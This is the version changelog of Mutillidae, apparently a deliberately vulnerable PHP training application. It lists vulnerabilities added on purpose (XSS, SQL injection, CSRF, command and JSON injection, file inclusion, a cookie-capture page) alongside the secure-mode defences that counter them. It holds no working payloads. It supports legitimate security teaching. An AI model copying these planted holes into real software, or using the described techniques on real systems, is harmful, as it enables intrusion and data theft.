05/13/2012: Jeremy Druin

Change Log for Mutillidae 2.1.19:

• Fixed broken link to https://addons.mozilla.org/en-US/firefox/collections/jdruin/pro-web-developer-qa-pack/ (Mozilla Add Ons) on the "Resources" sub-menu.
• Added "validation" to the html5 storage page for the "key" field. This validation checks for any non-alphanumeric characters and prints an error if non-alphanumeric characters are found. This error message contains the bad key the user input. Since the site fails to output encode this error message, it is possible to perform DOM injection.
• Added a large number of HTML 5 based exploits to the Mutillidae-Test-Scripts.txt file. Approximately 100 lines of new demonstration code has been added.
• On the setup or reset database page, if no errors were detected, the page now sends the user back to the page that requested the database be reset. A popup box gives the user the option to stay on the page.

03/15/2012: Jeremy Druin

Change Log for Mutillidae 2.1.18:

• The setup datebase page now clears HTML 5 Local and Session Storage
• Fixed alignment issues with icons on the captured-data page.
• Partially protected capture-data.php page so that the page can capture values that cause SQL injection. Other fields are left unprotected so users can practice sending SQL injections.
• Added timestamp to records captured in the captured-data.txt text file
• Added script to home page to add a value to HTML 5 storage when user visit the site. This will give users a web storage target to go after even if they dont visit the HTML 5 storage page.
• Coverted log-visit.php from using the hitlog table to using the LogHandler class. This will help consolodate code into a single point of failure for the logging process. All the code has been removed from log-visit.php except a call to the LogHandler.
• Adjusted top horizontal menu padding to move buttons closer together
• Added two new buttons to the top horizontal menu to allow user to get to the view log page and the view captured data page easier.
• Removed the gethostbyaddr() function from the LogHandler to prevent the long timeouts associated with the function when the DNS server is not available. If PHP changes so that the function has a timeout setting it will be brought back.
• Changed delete icon from jpeg to a transparent PNG so the icon can be put inline to the table headers to save space.
• Added delete log button to the show log page.
• Rearranged the buttons on the show logs page, added new icons, and cleaned up the code
• Added new information output about numner of records found to view logs page
• Made the buttons on the captured data page smaller to free up some space.

03/08/2012: Jeremy Druin

Change Log for Mutillidae 2.1.17:

• Added new menu items for DOM injection and Cookie injection.
• Added a delete captured data button to the captured data page
• Added new sub-menus to the cross site scripting menu for persistent and reflected cross site scripting. The pages to which the links point are existing pages but the new menus will help new users locate targets for these types of cross site scripting.
• Added large number of proven scripts to the Mutillidae-Test-Scripts.txt file
• Added link on View Blog Entries back to Add to Your Blog
• Added link on Add Blog Entries back to View Blogs
• Fixed typo on HTML 5 storage page
• Added delete buttons to the HTML 5 web storage page to help testing

03/01/2012: Jeremy Druin

Change Log for Mutillidae 2.1.16:

• Additional hints added to HTML5 Web Storage page to overwrite current web storage
• Additional hints added to HTML5 Web Storage page concerning reading current web storage. Added code examples for document.write and using Firebug command line.
• Added several new items to the Easter Egg file Mutillidae-Test-Scripts.txt
• New vulnerability added. The HTML5 Storage page now has cross site scripting via DOM injection. The "storage key" field is vulnerable.
• Added hints about DOM injection to the HTML5 Storage page.
• Added hints to the capture-data.php page about cross site scripting
• Updated the vulnerabilities listing

02/11/2012: Jeremy Druin

Change Log for Mutillidae 2.1.15:

• Upgraded the "JavaScript Validation" for the dns-lookup.php page. The JavaScript validation is only activated in security level 1. The new validation checks for cross-site scripting characters in addition to OS command injection characters. The validations are trivial to defeat by disabling JS in the browser or using an interception proxy to bypass the validation.
• In security level 1, on page add-to-your-blog.php the CSRF token is now generated. The token is predictable although perhaps not obvious. The intention is for students to use Burp-Suite sequencer to discover the pattern and inject the next token in the sequence (or to subtract each token from the last token).
• The CSRF token generator for the add-to-your-blog.php page is now using the OWASP Randomizer to generate random tokens in security level 5. The previous generator used mt_random() which was not really random. These new tokens have an entropy of around 132 bits.

01/30/2012: Jeremy Druin

Change Log for Mutillidae 2.1.14:

• Made menu smaller width. Menu is 10% of screen now. This should help when using mutillidae on a classroom projector showing at 1024 x 768.
• Made Banner 2.5% less tall. Gotta make some room people.
• Fixed formatting bug in dns-lookup.php that made hints look funny
• Added lots of new advanced examples to the Easter Egg file called Mutillidae-Test-Scripts.txt. The file is located in the documentation folder.
• Password Generator (password-generator.php): Fixed bug by removing brackets from possible characters that will be used to make password.
• Added new field to accounts: Boolean is_admin.
• Added concept of administrative users and regular users
• Added new vulnerability. There are secret pages that can be brute forced using a brute forcing tool like DirBuster or Burp-Intruder. Using Burp-Intruder try cycling through the "page" parameter with common names for secret pages. For example, try secret.php.
• Fixed typo on page not found page
• Created authorization required page
• Added "Secret" Administrative Pages to menu under A8 - Failure to Restrict URL Access
• Made menu item for Robots.txt more obvious
• Fixed typo on vulnerabilties documentation
• "Logged in user" now says "logged in admin" if the logged in user is an admin
• Updated accounts created as targets
• Improved output formatting on phpinfo.php page
• Altered phpinfo.php so that admins can see page in any level but regular users can only see page in security levels 0 and 1.

01/10/2012: Jeremy Druin

Change Log for Mutillidae 2.1.13:

• Added Mutillidae YouTube channel link to menu
• Fixed some menu links so they open in new window
• Added a hint to the framer.php page telling the user to try to change the security level.
• Added a new page called anti-framing-protection.inc. The page shows developers how to implement old-style javascript frame busting code. This isn''t used for new browsers because x-frame-options has supplanted the frame busting code, but there are still many old browsers running in kiosks and such.
• Added more documentation in the Easter Egg file Mutillidae test scripts
• Added Kevin Johnson as honorary default user
• Added more values to default database to make SQL injection more interesting
• Reduced the size of the header thickness to make more room
• Greatly improved SQL Injection tutorial or at least typed a lot more stuff
• Upgraded the Easter Egg file with more tips and tricks; mainly on SQL injection

01/09/2012: Jeremy Druin

Change Log for Mutillidae 2.1.12:

• Changed sort order for captured-data.php to descending by date so last capture floats to top
• Added a refresh button to the captured-data.php page
• Added all the latest pen-testing scripts to the easter egg file Mutillidae-Test-Scripts.txt
• Improved the hints on the HTML5 Storage page
• Oops. Fixed bug in HTML5 storage PHP page.
• Upgraded code in process-login-attempt.php pointed out by Josep Duran
• Fixed a bug on add-to-your-blog.php in the CSRF code which would not allow a new blog to be saved. Bug found by by Josep Duran.
• Made the table output on add-to-your-blog.php look nicer.
• Got rid of unneeded commented out code on set-background-color.php
• Improved output readability on dns-lookup.php
• Improved output readability on set-background-color.php

12/27/2011: Jeremy Druin

Change Log for Mutillidae 2.1.11:

• Added more tools to pen-test-tool-lookup.php.
• Added lots of HTML5 attacks to the easter egg file Mutillidae-Test-Scripts.txt
• Added new page capture.php which captures any information sent to the page in GET or POST parameters and saves them to a database table. Can be used to capture cookies, session storage, local storage, or other data. The page is designed to reflect the capture cookie page used in the SANS 542 Web Application Pen Testing course currently taught by Kevin Johnson of SecureIdeas. This page is designed to capture any parameters sent and store them in a file and a database table. It loops through the POST and GET parameters and records them to a file named captured-data.txt. On Windows system, the file should be found at C:/xampp/htdocs/mutillidae/captured-data.txt. The page also tries to store the captured data in a database table named captured_data. There is another page named captured-data.php that attempts to list the contents of this table.
• Added new page captured-data.php which displays data captured by page capture.php. In true Mutillidae fashion, this page is as vulnerable as all the others. Try hacking the hacker by sending SQL injections and XSS to the capture.php.
• Changed includes for database configuration to require_once so that some pages can stand alone or work with index.php
• Added a new table to the database called captured_data
• Added better comments to index.php
• Added data capture pages to menu under "Other"
• Added detailed tutorials to the HTML5 storage page and the pen-test-tools.php page showing how to pen-test and exploit HTML5 storage and perform JSON injections. To see the new hints sections browse to the pages and click the hints button. The hints show at the bottom of the page. The HINTS button is on the menu at the top of the screen.

12/17/2011: Jeremy Druin

Change Log for Mutillidae 2.1.10:

• Added menu item for the BACK buttons that are on all the pages. They are injectable to cause XSS. The menu item is located under OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Via HTTP Headers --> Those BACK Buttons. Any page will do. I just picked one at random.
• Corrected some errors in the HTML5 storage hints. You have to enable HINTS level 1 to see the hints. The HINTS button is on the menu at the top of the screen.
• Renamed setupreset.php to set-up-database.php
• Fixed a nasty bug in view someones blog where the dropdown was missing names of bloggers
• Fixed a minor formatting bug in html5-storage.php
• Adjusted the graphics on the home page
• Added a new page pen-test-tool-lookup.php. This page is vulnerable to JSON injection. A large tutorial was added as well showing how to perform JavaScript XSS injection into the JSON data so that the XSS executes. To see the tutorial, click the HINTS button. As an exercise, the user is encouraged to perform a JSON string injection and an HTML injection after learning how to perform the XSS injection. The JSON has been carefully designed to make it relatively easier to get the JSON injection to work. JSON injection can be somewhat tricky if a user has not tried it before and/or does not use JSON in web applications. The HINTS button is on the menu at the top of the screen. The page is also vulnerable to SQL injection, HTML injection, and JSON string injection in addition to XSS.
• The next step will be to add defenses to pen-test-tool-lookup.php. There will be a level 1 defense and a level 5 defense. The level 1 will just be JavaScript validation. Level 5 defense will be more robust and hopefully difficult to defeat. This will be release 2.1.11 or later.

12/16/2011: Jeremy Druin

Change Log for Mutillidae 2.1.9:

• Added a large cross site request forgery tutorial. To access the tutorial, the HINTS have to be on level 2.
• Adding better formatting to the Cross Site Scripting Tutorial
• Updated the menu to point the user to two pages which are vulnerale to CSRF

12/15/2011: Jeremy Druin

Change Log for Mutillidae 2.1.8:

• Bug fix: The links on the front home page were absolute instead of relative. This was not an issue in XAMPP installations but caused an issue when installed on Samurai because Samurai uses http://mutillidae as Mutillidae's URL while XAMPP just uses http://localhost. The links should have been relative anyway.

11/26/2011: Jeremy Druin

Change Log for Mutillidae 2.1.7:

• Added a new page for HTML5 storage. The page is meant to show how to both use and attack HTML5 storage. The page supports Local and Session storage types. The user can attack the storage in two contexts. They can act as if they want to read to contents of their own browsers session storage to see if the developer put authorization tokens or other items into the storage. They can also try to use XSS to steal the session storage. In this use-case the user would be acting as if they wanted to read someone elses storage. A large number of hints has been added to the page. The page name is "html5-storage.php" and can be accessed from the Cross Site Scripting menu and information leakage menu. In security level zero, the page has no defenses. In level 1, the page will use trivial JavaScript validation. In security level 5, the page will refuse to put the secrets in client side storage.

11/13/2011: Jeremy Druin / Kenny Kurtz

Change Log for Mutillidae 2.1.6:

• Enhanced the .htaccess file to automatically disable magic quotes on systems which enable them by default (such as some OSX versions of PHP)
• Fixed some bugs in the phpinfo.php file that made the page display weird.
• Enhanced the hidden PHPINFO page so that it would work if the user browsed to http://localhost/mutillidae/index.php?page=phpinfo.php or to http://localhost/mutillidae/phpinfo.php. This example assumes Mutillidae is running on localhost.
• Fixed a bug in index.php that kept the log-visit page from being included.
• Fixed a bug in log-visit.php that kept the page from working.
• Fixed installation instructions format for IE 8 not in compatibility mode.

11/10/2011: Jeremy Druin

Change Log for Mutillidae 2.1.5:

• Added vuln to login sequence. Now a cookie is created with username. Students should try to XSS the cookie and see what happens. Also try a response splitting attack because a cookie is an HTTP header.
• Created new twitter feed to make Mutillidae announcements and other web vulnerability tweaks. @webpwnized
• Fixed installation instructions format for IE 8 not in compatibility mode

10/14/2011: Jeremy Druin

Change Log for Mutillidae 2.1.4:

• Moved usage instructions and php errors from the home page to their own pages.
• In insecure mode, changed the method of the user-info.php page to GET in order to make it easier to use sqlmap against Mutillidae. sqlmap supports POST but it is easier to use with GET.
• Added hints about sqlmap to sql injection tutorial and to the easter egg file
• Added a credit card table as a target in the database
• Confirmed that the view-blog table can be attacked with sqlmap. The answer is in the Easter Egg file.
• Updated the SQL injection tutorial file

10/13/2011: Jeremy Druin

Change Log for Mutillidae 2.1.3:

• Fix a bug. If the user was on the home page, without having clicked any link to this point (such as when using a bookmark), then the user clicked the "change security level", the page would redirect to page not found.
• Increased the slide time for the ddsmoothmenu to make it slow down a little bit
• Added a NEW vulnerability. Many sites have crazy pages that show server settings, expose admin functionality, allow configuration, or other features a user should not be able to see. The problem is not the pages themselves so much as the fact that developers think no one will guess the name and browse to them. Shoulder surfing, guessing, brute-forcing, etc can be used to find these pages. Mutillidae now has such a page. It is in the "Server Misconfiguration" category. See secret-administrative-pages.php for hints.
• Augmented the installation instructions
• Added link to ihackcharities to front page

09/25/2011: Jeremy Druin

Change Log for Mutillidae 2.1.2:

• Added a new security level. Now there is security level 1. The only difference in this release between level 0 and level 1 is that level 1 has JS validation. The JS validation has been in place for a while to allow but was activated in level 0. Since level 0 is supposed to be very easy, the decision was made to create level 1 and move JS validation to level 1. The JS validation is trivial to bypass. Simply disable JS or use a proxy such as Tamper Data, Paros, Burp, WebScarab, or others.
• Page homenotes.php has been merged with home.php.
• Page home.html has been renamed home.php
• Added protection for SQL injection to add to your blog.php output of the current users blog entries. Prior to this patch, you could SQL inject in security level 5 by putting your injection in the current users login name because the query uses the current users login name as the input to the query.
• Improved the DNS lookup page to add JS validation in security level 1 mode.
• Changed padding for BACK button to use styles rather than HTML BR tags.
• Changed the password generator password length to 15 to set a better example.
• Some refactoring on user-info.php and login.php to clean up code

09/16/2011: Jeremy Druin

Change Log for Mutillidae 2.1.1:

• Added CSRF Protection to page add to your blog. This only works in secure mode.
• Added more scripts to the easter egg file (Mutillidae Test Scripts)
• Bug fix: The setupandreset.php errors were not printing out.
• Stupid bug fix: Removed the "open DB" that was firing before the database was actually created.
• Created output on page setupandreset.php to show what happened
• Added try/catch and more error handling to setupandreset.php

08/31/2011: Jeremy Druin

Change Log for Mutillidae 2.1.0:

• Fixed error on page add to your blog. Input user was not escaped or encoded in secure mode.
• Major change. The MYSQL connection has been changed from procedure mysql_ functions to using object oriented instances from the class mysqli. mysqli became available in PHP 5.3.0 and is brand new to Mutillidae. There is a high chance of error. Please let me know if there are bugs found. This new class gives us many new abilities including the ability to call stored procedures without using concatenation. This change affects the entire project and changes the capabilities of the project which is why the minor version was updated. All of the database code has been ripped out and replaced from the ground up. Next will be to add stored procedures and views to the database. When SQL injection is done on meta data, there will be many more targets. Users will be able to steal the source code from views and procs during pen tests along with dumping tables.
• Added row number to output on add to your blog
• Added logging for successful and failed login attempts.
• Fixed bug in closing bold tag tokenizer on add to your blog
• Updated page arbitrary-file-inclusion.php. Now you can practice making arbitrary system files load. The fun never ends.
• Added SQL injection defenses to closedb.inc. This may not make much sense unless you know that closedb.inc logs to the hitlog table. Part of what it logs is user agent and referer which are controls by the user.
• Create new page log-visit.php which logs each request to the server. This page could be used to poison the log with XSS or SQL inject the database.
• Fix bug on dns-lookup.php that allowed the log to be injected even in secure mode.
• Add new page vulnerabilities.php that document the vulnearbilities on each page to help users know what to try
• Renamed home.htm to home.html for compliance with convention
• Reconfigured index.php to open database as late as possible
• Refactored opendb.inc to use standard error handling like rest of site. Page size is much smaller as a result
• Added a new XSS vulnerability to page user-info.php. This can be exploited by inputing scripts into the username field.
• Added row count output to the show-log.php page
• Fixed back button so it doesnt span entire width of the page
• Added error output to page register.php. In insecure mode, the user can get a lot of information about the insert. In secure mode, we keep that to ourselves.

08/19/2011: Jeremy Druin

Change Log for Mutillidae 2.0.13:

• Added a new page called password-generator that allowed the user to practice HTML injection, cross site scripting, and JavaScript injection. The page is primarily intended to practice the JS injection in as easy a way as possible.

07/24/2011: Jeremy Druin

Change Log for Mutillidae 2.0.12:

• Changed the label of the link to "Cross Site Framing" to "Click-Jacking"
• Created a new page to frame the Mutillidae site so we can practice Cross-Site Framing. Added a menu item under Other --> Information Leakage --> Cross-Site Framing. In secure mode, Mutillidae does not allow itself to be framed by third party sites. Enjoy.
• Created a new menu path for "Missing HTTPOnly Attribute" because it doesn't really fit directly into a XSS exploit. It is a misconfiguration that leads to an exploit.
• Created a new page to talk about the site footer displaying the user agent string. The new page includes hints.
• Refactored footer.php to remove database closing code. This code is in index.php now.
• Added new vulnerability for remote file inclusion. Access via "A4 - Insecure Direct Object References" --> "Arbitrary File Incusion". Enjoy!

07/17/2011: Jeremy Druin

Change Log for Mutillidae 2.0.11:

• Oops! Fixed a bug in the secure code which (ironically) did not stop the command injection as long as the attacker chained the attack with a validly formed IPV4 address. I forgot to put the starts-with and ends-with symbols on the RegEx.
• Added IPV6 pattern as a valid pattern on page dns-lookup.php. The page will accept IPV6, IPV4, or Domain Name.
• Made some cosmetic improvements to the dns-lookup.php page
• Added a whole new batch of fun. Mutillidae now supports (and defends) against Cascading Style Injection. Enjoy.

07/09/2011: Jeremy Druin

Change Log for Mutillidae 2.0.10:

• Added new vulnerability HTTP Parameter Pollution on page user-poll.php
• Added defense for JavaScript injection in the "Back" buttons. In secure mode, Mutillidae will encode the HTTP Referer header using JavaScript encoding

06/21/2011: Jeremy Druin

Change Log for Mutillidae 2.0.9.1:

• Added new menu items under SQLi for SQLi Insert Injection
• Added new menu item for documentation
• Moved constants into constants.php file
• Patched tabbing in home.htm
• Added additional instructions on supressing PHP errors with XamppLite. Thanks to Miguel Wherner for the tip.
• Added more hints to command injection page
• Updated the Easter egg file
• Added "Bookmark This Site" button to the resources tab in the menu
• Added lots more default users
• Added a stored procedure for users to attempt to extract the source code using SQL injection
• Added a stored procedure to support logins so we can start to put real security into this thing.
• Added new article "How to Access Mutillidae over Virtual Box Host Only Network"
• Introduced a new vulnerability: JavaScript Injection

06/15/2011: Jeremy Druin

Change Log for Mutillidae 2.0.8:

• Added more comments to the code to explain how defenses work
• Added support for the <u></u> tag to the blog. In secure mode Mutillidae will allow this tag but still safely encode output and stop XSS.
• Added JavaScript filtering to prevent single quotes from being entered in blog entries. This give practice bypassing JavaScript "security" and helps the user understand JavaScript cannot provide security.
• Added lots of JS filtering to login.php. Nearly all characters are filtered. Users are encouraged to understand that JavaScript and filtering are useless for security.
• Added autofocus to login.php and add-to-blog.php
• Added more "allowed dangerous HTML tags" to the blog. Until now only the bold HTML tag was supported. Also the output was not HTML5 compliant. For example, if the user entered a bold tag, then a bold tag was output however the bold tag is depreciated. Styles must be used. So Mutillidae allows the user to input a bold tag but will correctly encode this as a sytle upon output. The italic tag is now supported as a dangerous input which is safely output without fear of Cross Site Scripting. These defenses only operate in secure mode of course. In insecure mode, the site allows any input and simply outputs whatever is input without any encoding.
• Changed menu for OWASP A1 - Injection to differentiate between SQL, HTML, and Command Injection. This should make it more clear which pages exhibit vulnerabilities with the specific injecton sub-types. Also added new link for Blind SQL Injection.
• Changed menu for OWASP A2 - Cross Site Scripting to differentiate between XSS coming in via user supplied fields (GET/POST) and values within HTTP Request Headers.
• Added tutorials feature.
• Added SQL Injection Totorial
• Added Cross Site Scripting tutorial
• Added Command Injection tutorial
• Added new feature. Hints can now be at different levels. Each time the user clicks Hints, the level increases by 1 until rolling over.
• Removed the installation instructions from the home page. A new page for instructions is created and linked from the menu.
• Augmented the installation instructions to include running from Samurai, creating a custom ISO, installing to XAMPP, and running in virutal machines.
• Reformatted install instructions and main home page to be compliant with HTML 5

05/20/2011: Jeremy Druin

Change Log for Mutillidae 2.0.7:

• Added a new page rene-magritte.php to explore click-jacking. In secure mode, Mutillidae will send the X-FRAME-OPTIONS: DENY header. In modern browsers, this will cause the browser to throw an error rather than allow the page rene-magritte.php to be framed.
• Added a resources link to the main menu. Links are to information or tools that can help with testing Mutillidae.
• Added new class LogHandler to take over logging. Previously logging statements has to be copied to each spot that logging was needed. With the new class, logging requires only one line of code and the logger automatically logs based on the current security level. If in insecure mode, no attempt to stop XSS or SQLi is made. With the new class, many less lines of code are needed and many more places log. With more places logging, there is a much better chance of finding a log exploit and taking advantage (insecure mode). Logging added to pages: add-to-your-blog, dns-lookup, text-file-viewer, source-viewer.php, register.php, redirectandlog.php, and user-info.php
• Added more default users to initial setup to give more targets.

05/10/2011: Jeremy Druin

Change Log for Mutillidae 2.0.6:

• Added a new security vulnerability and counteracting secure code. The "business requirements" for the add-new-blog-entry page now require users to be able to enter a bold tag in their blog. In secure mode, Mutillidae allows this functionality while still protecting the users from mallicous injection input.
• A new secret page has been added. There are lots of test scripts that the developers used to hack Mutillidae inside. It will be very hard to guess the name of the file but there are plenty of vulns that will allow users to locate and open the file.

04/22/2011: Jeremy Druin

Change Log for Mutillidae 2.0.6:

• Added a new security vulnerability and counteracting secure code. Cookies are unprotected in insecure mode, but in secure mode, the cookies will have the HTTPOnly attribute applied to them. In reality this vulnerability was always in Mutillidae since ignoring the issue opens the vulnerability (the ability for scripts to access the cookie values). The change is acknowleging this issue and adding the defense. Once we get an SSL certificate installed, the next logical step will be to add the "Secure" attribute to cookies in secure mode, but to not add this attribute in insecure mode.
• Added the X-FRAME-OPTIONS: DENY click-jacking defense in secure mode. In insecure mode, the site does nothing and ignores the issue entirely. This defense only works in newer browsers and javascript framebusters are needed to help older browsers.
• Added insecure comments vulnerability and defense. Some developers use HTML or JavaScript comments instead of using the frameworks comments (ASP.NET, Java, PHP, Etc.)
• Rearranged instructions on home page to emphasize the PHP.ini configuration changes that are needed to get rid of errors.
• Rewrote opendb.inc to have error trapping and custom error handling. If there is an error, there will be some diagnistic information available.

04/14/2011: Jeremy Druin

Change Log for Mutillidae 2.0.5:

• browser-info.php - Patched a bug which disabled entire page if the whois server is not reachable. Now only that one line will be disabled. Also replaced Windows style file path slashes with Unix style. Either slash will work in Windows but Linux only accepts the Unix style path else throws an error.

04/13/2011: Jeremy Druin

Change Log for Mutillidae 2.0.4:

• user-info.php - Added XSS defenses to the output so that users cannot poison their username, password or signature to cause XSS. This only works in secure code.
• register.php - Added XSS defenses to the output so that users cannot poison their username to cause XSS. This only works in secure code.
• header.php - Added link to this changelog. Changed style of upper header to allow more space for logged in user text. In very small screens, the text was overlapping. Also, the size of the mascot image was reduced to give the user more screen space.
• change-log.php - Added new XSS vulnerability for users to try.

03/30/2011: Jeremy Druin

Change Log for Mutillidae 2.0.3:

• index.php - Added PHP version detection and altered forms caching defenses and server header information defenses to use header_remove() only if the version of PHP is at 5.3 or above. Made version string variable that contains whatever version string is for Mutillidae plus "nice" output. Samurai is going through a PHP version change to 5.3 right now and XAMPP just went through the same change. This code is meant to bridge users caught between versions.
• header.php - Made version output simpler. header.php only outputs the header string.
• footer.php - Added PHP version to footer output in insecure mode. In secure mode, server version is not shown.

03/25/2011: Jeremy Druin

Change Log for Mutillidae 2.0.2 Beta:

Whole site

• Made local relative links without leading dot
• Installed on Samurai 0.95 for testing. Found that Samurai doesnt like the leading dot in local file paths. Those were removed from the index.php page.
• Made version a variable in index.php to make updating version string easier
• Added new forms caching information leakage vulnerability
• Added new vulnerability for X-Powered-By and discussed removing the Server HTTP header in comments

03/23/2011: Jeremy Druin

Change Log for Mutillidae 2.0.1 Beta:

Whole site

• Replaced root relative links with local relative links to allow more freedom in root folder name
• Added email address for Jeremy
• Added change log to site
• Added Toggle Hints into core menu but link disappears in secure mode
• Added new failure to restrict URL access vuln

03/23/2011: Jeremy Druin

Change Log for Mutillidae 2.0 Beta:

Whole site

• Site implements the OWASP ESAPI API for PHP including showing how to instantiate classes and call methods for output encoding.
• Site now allows user to switch between secure and insecure mode to allow the user to employ an attack then try the same attack against more secure code
• All code for both modes of operation are available for inspection and include large amounts of explanation comments for both the insecure and secure sections. Code is commented in such a way to help developers understand the security concepts as opposed to only seeing the PHP implementation
• Added custom error handling to site which reacts differently depending on security mode
• Site has larger hint sections with more hints included
• Added menuing system for easier navigation
• Added toolbar at top of each page for critical functions (hints, security mode, home page, etc.)
• Converted styles to CSS
• Collected images into single folder
• Added links to helpful tools and sites with more information: OWASP, Toad for PHP, Eclipse PDT, Samurai WTF, and Backtrack 4 R2
• Released new web interface design and navigation for each page
• Installed TRY/CATCH handling in all pages

add-to-your-blog.php

• additional reflected XSS vuln added
• SQLi vector added
• additional stored XSS vuln added
• demonstrates output encoding
• demonstrates SQLi prevention
• non-input box attack vector added

browser-info.php

• demonstrates safer JavaScript
• created ClientInformationHandler class to gather client information
• demonstrates output encoding
• added JavaScript attack vector using innerHTML

credits.php

• added Insecure Direct Object Reference defenses

dns-lookup.php

• In secure mode, added strong server-side validation for page. Page allows both ip based and DNS name based attacks and includes defenses for both.

footer.php

• added new attack vector to allow refelected XSS via HTTP headers
• added defenses for input coming from HTTP headers
• added comments encouraging developers to treat ALL input as evil and not just the input boxes they created

header.php

• Replaced menu with mouseover navagation and updated menu with new attacks
• Added new stored cross site scripting attacks and defenses
• Added code to allow site to ignore user created cookies in secure mode and react to user created cookies in insecure mode

home.html

• Added instructions
• Added warning about PHP.ini files that come with new XAMPP/PHP versions 5.3 and 6.0 (future)

homenotes.php

• Created newly formatted hints section

index.php

• Created new processing framework
• Added the ability to use session storage
• Installed initialization code

login.php

• added HTML maxlength to allow practice of circumventing trivial and useless HTML based defenses
• Added detection of whether user is currently logged in with new funcitonality. Site will auto-detect when users are logged in and change links appropriately
• Added new reflected XSS vector

process-commands.php

• new file which collects all "do" commands together
• installed several new attack vectors and defenses based on the "do" commands

redirectandlog.php

• Created new HTTP parameter pollution attack
• Installed advanced mapping defences with validation
• Installed strong validation defenses

register.php

• installed SQLi and XSS defenses
• reformatted page with new design and error feedback

show-log.php

• installed DOS defenses
• added DOS attack vector
• installed tabular output
• added defenses for injection attacks and XSS
• added attack vector against log

source-viewer.php/text-viewer.php

• Added/augmented attack vectors
• Added new attack vectors to allow loading of local server files
• Filename injection (Insecure Direct Object Reference)
• SQL Injection, (Fix: Use Schematized Stored Procedures)
• Cross Site Scripting, (Fix: Encode all output)
• Cross Site Request Forgery, (Fix: Tokenize transactions)
• Insecure Direct Object Reference, (Fix: Tokenize Object References)
• Denial of Service, (Fix: Truncate Log Queries)
• Loading of Local Files, (Fix: Tokenize Object Reference - Filename references in this case)
• Improper Error Handling, (Fix: Employ custom error handler)
• SQL Exception, (Fix: Employ custom error handler)
• HTTP Parameter Pollution (Fix: Scope request variables)
• Added mapping defenses

user-info.php

• added SQL and XSS defenses
• added tabular output

view-someones-blog.php

• installed SQLi and XSS defenses
• installed trivial and useless "tokens" to allow user to bypass HTML code which intends to confuse instead of defend.